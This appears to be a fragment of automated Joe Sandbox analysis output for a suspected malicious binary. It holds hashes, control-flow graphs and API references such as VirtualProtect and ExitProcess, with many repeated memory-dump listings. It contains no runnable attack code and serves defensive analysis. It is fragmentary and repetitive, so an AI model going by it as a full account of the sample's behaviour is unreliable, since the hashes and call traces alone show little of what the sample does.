                                                                                      • Opcode ID: 9f0f1844b2792f6289a68aa481918173698037378d1d849b0242b6f58344341e
                                                                                      • Instruction ID: d68808ad5a64134e19428d3702e83c9544b217b0ac88ae37362fcad393806145
                                                                                      • Opcode Fuzzy Hash: 9f0f1844b2792f6289a68aa481918173698037378d1d849b0242b6f58344341e
                                                                                      • Instruction Fuzzy Hash: FD610AF1D041249BE720CB18EC84EEB7B78EB45311F1081BADD4D57241D238AEC5CE96

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32(?,004D5458,00000060), ref: 004830EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Version
                                                                                      • String ID:
                                                                                      • API String ID: 1889659487-0
                                                                                      • Opcode ID: b4beac88c408034cd6b1b197a26923240ce7189b176719802b30a22765eb812b
                                                                                      • Instruction ID: bbbccd461c33d45f8b3cf5feac9dc0283bdde673479183e1fdc022dde5b57861
                                                                                      • Opcode Fuzzy Hash: b4beac88c408034cd6b1b197a26923240ce7189b176719802b30a22765eb812b
                                                                                      • Instruction Fuzzy Hash: 0FF03071D007618BC324EF19DC86916BBE2AF99711B15843EE4599B722D738A841CF9C

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,00458FE5,00000000,?,0043A418,?,?,00458E08,?,00000000), ref: 0045957C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID: 88KD$<7FJ
                                                                                      • API String ID: 621844428-1757358736
                                                                                      • Opcode ID: 7cfadf25fe344548fad222db02554845c6424e7a46d18c0285ae2b9e79919499
                                                                                      • Instruction ID: a6bfe100b278e76014209b67bfc34ea6b665bc747e264d3db9e8ff7f7f798c71
                                                                                      • Opcode Fuzzy Hash: 7cfadf25fe344548fad222db02554845c6424e7a46d18c0285ae2b9e79919499
                                                                                      • Instruction Fuzzy Hash: 005159F3D082846FF7108660EC45AEB7B7CEB81315F1541BFE80996142DA3DAACA8657

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 61 4590dc-45910a 63 45910c-45914a 61->63 64 45914f-459190 61->64 65 45956e-45957c ExitProcess 63->65 66 4591d5-459299 64->66 67 459192-4591a7 call 4591a9 64->67 74 459562-459568 66->74 75 45929f-459376 call 459359 66->75 67->66 74->65 81 459381-45938f 75->81 82 459395-4593a2 81->82 83 45941d-45943c call 45943f 81->83 82->83 84 4593a4-4593ef 82->84 86 4593f1-45940d 84->86 87 45940f 84->87 86->87 90 459416 86->90 87->81 90->83
                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,00458FE5,00000000,?,0043A418,?,?,00458E08,?,00000000), ref: 0045957C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: cd39c6b23871c361f9ae420f6ac07241ca715778ccdf598f6a02fdd13f4f7143
                                                                                      • Instruction ID: 2ee97472e8eed77e899391913360b512873cd34c1538d3d9648707520fa02a04
                                                                                      • Opcode Fuzzy Hash: cd39c6b23871c361f9ae420f6ac07241ca715778ccdf598f6a02fdd13f4f7143
                                                                                      • Instruction Fuzzy Hash: 7C8112B2D04114DFEB24CA14DD94BEF7B79EB84315F2480BAD90D96382D638AEC6CE41

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 125 457415-4574b3 128 45777c-457782 125->128 129 4574b9-457563 call 4574df call 45751f call 457566 125->129 131 457788-4577b9 VirtualProtect 128->131 129->131 133 4577f2-457875 call 457877 131->133 134 4577bb-4577d7 call 4577d8 131->134
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004577B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 0bd02dc490c1241426775e9042cc61c56eaa2a01f97e21cab48e93037cbf08b7
                                                                                      • Instruction ID: b3586dca80ca221ff8b64fb189e8d95115207d6d609fcc3bc6edd7740bfddc85
                                                                                      • Opcode Fuzzy Hash: 0bd02dc490c1241426775e9042cc61c56eaa2a01f97e21cab48e93037cbf08b7
                                                                                      • Instruction Fuzzy Hash: AB51D8F2D041186BF710CB19EC94EEB7B79EB85310F1481BAED4D57201D6386EC5CAA2

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 146 457566-457590 148 45759b-4575a9 146->148 149 457637-457682 148->149 150 4575af-4575bc 148->150 151 457684-45768e 149->151 152 457693-4576e4 call 4576bb 149->152 150->149 153 4575be-457609 call 4575ec 150->153 154 45772e-457735 151->154 176 4576e6-4576f0 152->176 177 4576f2-457724 call 457720 152->177 165 457629 153->165 166 45760b-457627 153->166 159 457777 154->159 160 457737-457775 154->160 162 457788-4577b9 VirtualProtect 159->162 160->162 168 4577f2-457875 call 457877 162->168 169 4577bb-4577d7 call 4577d8 162->169 165->148 166->165 170 457630 166->170 170->149 176->154 177->154
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004577B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: ea16ff14538fa9c5b50318946c30c5300e1a8d22d2914a7b773b0f7d21a9fde7
                                                                                      • Instruction ID: 018eb0f31ad35fde33a9f6022f8b42f1226c4639ec5d2039aeb0d1cb9878c63a
                                                                                      • Opcode Fuzzy Hash: ea16ff14538fa9c5b50318946c30c5300e1a8d22d2914a7b773b0f7d21a9fde7
                                                                                      • Instruction Fuzzy Hash: 1D516CB1D084646BEB20CB59FC94AEF7B75AF41312F1481BBEC4952241D6385A8ACF86
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 05289697b2cdedb9339579d407ae95806c8e139b9d69a73bce6af941574b3b56
                                                                                      • Instruction ID: 697350b7b1bbcf0c5c72ef0f7784fc91f909004554b351d5157fa81dfa9e08aa
                                                                                      • Opcode Fuzzy Hash: 05289697b2cdedb9339579d407ae95806c8e139b9d69a73bce6af941574b3b56
                                                                                      • Instruction Fuzzy Hash: 3D414871D084646BEB14CB58EC94AEF7B75AF41312F1480BBEC4D93641D6386E89CF86

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 183 4576bb-4576e4 185 4576e6-4576f0 183->185 186 4576f2-457724 call 457720 183->186 188 45772e-457735 185->188 186->188 190 457777 188->190 191 457737-457775 188->191 193 457788-4577b9 VirtualProtect 190->193 191->193 195 4577f2-457875 call 457877 193->195 196 4577bb-4577d7 call 4577d8 193->196
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004577B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 3783b7c73eb49244622a8ff2a349a7e63d3885b47b8f431044d47d28b4d4c8fe
                                                                                      • Instruction ID: 8cd7d327917692e4169bd7ac595c57ca90898d8be8807bceb865113541fb8b03
                                                                                      • Opcode Fuzzy Hash: 3783b7c73eb49244622a8ff2a349a7e63d3885b47b8f431044d47d28b4d4c8fe
                                                                                      • Instruction Fuzzy Hash: A12129B2C085749BF7208625EC44FDB7B78EB06311F1041FADC4D62541C6385E8ACED6

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 202 4594a1-4594ca 203 4594cc-4594d6 202->203 204 4594d8-45950a 202->204 205 459514-45951b 203->205 204->205 207 45955d 205->207 208 45951d-45955b 205->208 210 45956e-45957c ExitProcess 207->210 208->210
                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,00458FE5,00000000,?,0043A418,?,?,00458E08,?,00000000), ref: 0045957C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
